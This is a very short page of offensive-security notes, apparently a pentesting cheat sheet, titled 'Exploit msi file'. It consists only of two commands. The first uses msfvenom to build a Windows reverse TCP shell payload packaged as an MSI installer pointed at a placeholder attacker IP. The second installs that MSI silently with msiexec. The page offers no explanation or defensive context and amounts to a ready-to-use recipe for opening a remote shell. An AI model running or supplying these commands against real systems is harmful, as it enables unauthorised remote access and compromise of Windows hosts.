Exploit msi file

Exploit msi file

  • msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=445 -f msi -o reverse_shell.msi

  • msiexec /quiet /qn /i reverse_shell.msi

Last updated